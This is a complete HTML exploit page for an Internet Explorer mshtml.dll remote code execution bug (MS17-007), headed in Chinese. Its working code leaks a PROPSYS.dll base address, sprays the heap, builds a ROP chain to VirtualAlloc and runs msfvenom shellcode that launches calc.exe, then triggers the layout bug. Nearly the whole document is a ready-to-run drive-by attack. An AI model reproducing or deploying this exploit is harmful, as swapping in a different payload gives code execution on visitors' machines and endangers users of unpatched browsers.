Microsoft Internet Explorer - mshtml.dll 远程代码执行 (MS17-007) exploit（完整的利用页面：信息泄露 + 堆喷射 + ROP，payload 为 msfvenom 生成的 windows/exec calc.exe shellcode，见脚本内注释）

<!DOCTYPE html>
<html>
<head>
    <!-- Layout rules referenced by the markup at the bottom of the page:
         .class1 goes on the <tr>, .class2 on a <th> and the <div> inside it.
         boom() later rewrites this stylesheet's media text; the values here
         are part of the PoC layout and should be kept as-is. -->
    <style>
        /* floated row laid out in 5 CSS columns */
        .class1 { float: left; column-count: 5; }
        /* element spanning all columns, with 1px-wide columns of its own */
        .class2 { column-span: all; columns: 1px; }
        table {border-spacing: 0px;}
    </style>
    <script>
  
    var base_leaked_addr = "";
  
    function infoleak() {
      
        var textarea = document.getElementById("textarea");
        var frame = document.createElement("iframe");
       
        textarea.appendChild(frame);
        frame.contentDocument.onreadystatechange = eventhandler;
  
        form.reset();
          
    }
       
    function eventhandler() {
      

        document.getElementById("textarea").defaultValue = "foo";


        //替换对象
      
        var audioElm = document.createElement("audio");
            audioElm.src = "test.mp3";
                  
    }
      
    function writeu(base, offs) {
      
        var res = 0;
        if (base != 0) {  res = base + offs }
        else {  res = offs }
        res = res.toString(16);
        while (res.length < 8) res = "0"+res;
        return "%u"+res.substring(4,8)+"%u"+res.substring(0,4);
          
    }
      
    function readu(value) {
                  
        var uc = escape(value);
        var ucsplit = uc.split('%');
        var res = parseInt('0x' + ucsplit[2].replace('u', '') + ucsplit[1].replace('u', ''));
        return res;
          
    }
          
    function spray() {
      
        // DEPS 避免空字符
  
        var hso = document.createElement("div");
        base_leaked_addr = parseInt(base_leaked_addr,16);
  
        var junk = unescape("%u0e0e%u0e0e");
        while (junk.length < 0x1000) junk += junk;
  
  
        var rop = unescape(
            writeu(base_leaked_addr,0x56341) +
            writeu(base_leaked_addr,0x56341) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(0,0xffffffff) +
            writeu(base_leaked_addr,0x2a89e) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x4e385) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x2030f) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            writeu(0,0xf07645d5) +
            writeu(base_leaked_addr,0x6e002) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0xaebc) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(0,0xffffffbf) +
            writeu(base_leaked_addr,0x2a89e) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x6361b) +
            writeu(base_leaked_addr,0x432cf) +
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(base_leaked_addr,0x5cef1) +
            writeu(base_leaked_addr,0x4177e) +
            writeu(base_leaked_addr,0x9b7c) +
            writeu(base_leaked_addr,0x1244) +
            writeu(base_leaked_addr,0xa819) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x2720b) +
            "" );
  
       
          
          
        // 将ESP移动到 VirtualAlloc ROP
        var stack_shift_rop = unescape(
            writeu(0,235802130) +
            writeu(base_leaked_addr,0x2030f) + // 0x6af5030f :  # POP EBX # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x0e0e1258) +
            writeu(base_leaked_addr,0x28002) +  // 0x6af58002 :  # MOV EAX,EBX # POP EBX # POP EBP # RETN 0x08    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            writeu(base_leaked_addr,0x0b473) + //0x6af3b473 :  # XCHG EAX,ESP # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
            writeu(0,0x41414141) +
            writeu(0,0x41414141) +
            "");
          
          
          
  
        // root@kali:~# msfvenom  -p windows/exec cmd=calc.exe -b "\x00" -f js_le
        // ~2854 bytes max
          
        var shellcode = unescape("%uec83%u4070" + // move stack pointer away to avoid shellcode corruption
                "%ucadb%ub6ba%u0f7b%ud99f%u2474%u5ef4%uc929%u31b1%uee83%u31fc%u1456%u5603%u99a2%u63fa%udf22%u9c05%u80b2%u798c%u8083%u0aeb%u30b3%u5e7f%uba3f%u4b2d%uceb4%u7cf9%u647d%ub3dc%ud57e%ud51c%u24fc%u3571%ue73d%u3484%u1a7a%u6464%u50d3%u99db%u2c50%u12e0%ua02a%uc660%uc3fa%u5941%u9a71%u5b41%u9656%u43cb%u93bb%uf882%u6f0f%u2915%u905e%u14ba%u636f%u51c2%u9c57%uabb1%u21a4%u6fc2%ufdd7%u7447%u757f%u50ff%u5a7e%u1266%u178c%u7cec%ua690%uf721%u23ac%ud8c4%u7725%ufce3%u236e%ua58a%u82ca%ub6b3%u7bb5%ubc16%u6f5b%u9f2b%u6e31%ua5b9%u7077%ua5c1%u1927%u2ef0%u5ea8%ue50d%u918d%ua447%u39a7%u3c0e%u27fa%ueab1%u5e38%u1f32%ua5c0%u6a2a%ue2c5%u86ec%u7bb7%ua899%u7b64%uca88%uefeb%u2350%u978e%u3bf3" +
        "");
      
          
        var xchg = unescape(writeu(base_leaked_addr, 0x0b473));  // Initial EIP control ---> 0x6af3b473 :  # XCHG EAX,ESP # RETN    ** [PROPSYS.dll] **   |   {PAGE_EXECUTE_READ}
        var fix1 = 0x15c;
        var fixop = unescape("%u0e0e%u0e0e");
        var offset_to_stack_shift = 0x6f7;
        var offset_to_xchg = 0xd2+2;
        
        data = junk.substring(0,fix1-rop.length) + rop + fixop + shellcode + junk.substring(0,offset_to_stack_shift-fix1-fixop.length-shellcode.length) + stack_shift_rop + junk.substring(0,offset_to_xchg-stack_shift_rop.length) + xchg;
        data += junk.substring(0,0x800-offset_to_stack_shift-offset_to_xchg-xchg.length);
      
        while (data.length < 0x80000) data += data;
        for (var i = 0; i < 0x350; i++)
        {
            var obj = document.createElement("button");
            obj.title = data.substring(0,(0x7fb00-2)/2);
            hso.appendChild(obj);
        }
    }
  
    function boom() {
        document.styleSheets[0].media.mediaText = "aaaaaaaaaaaaaaaaaaaa";
        th1.align = "right";
    }
      
    setTimeout(function() {
  
        var txt = document.getElementById("textarea");
        var il = txt.value.substring(0,2);
        var leaked_addr = readu(il);
        base_leaked_addr = leaked_addr - 0xbacc; // base of propsys
        base_leaked_addr = base_leaked_addr.toString(16);
        spray();
        boom();
          
    }, 1000);
    </script>
</head>
  
<body onload=infoleak()>
    <form id="form">
        <textarea id="textarea" style="display:none" cols="81">aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa</textarea>
    </form>
<script>
    // Markup notes (kept in script text so no extra DOM nodes are added):
    // - <form id="form"> / <textarea id="textarea">: infoleak() nests an iframe
    //   in the textarea and calls form.reset(); the setTimeout callback later
    //   reads the first two characters of the textarea's value as the leak.
    // - <table>: <tr class="class1"> and the .class2 <th>/<div> use the CSS in
    //   <head>; boom() changes the stylesheet's media text and then th1.align.
    //   Attribute values (colspan="0", width=2000000, width=0) are part of the
    //   PoC layout and should be kept as-is.
</script>
    <table cellspacing="0">
        <tr class="class1">
        <th id="th1" colspan="0" width=2000000></th>
        <th class="class2" width=0><div class="class2"></div></th>
    </table>
</body>
</html>


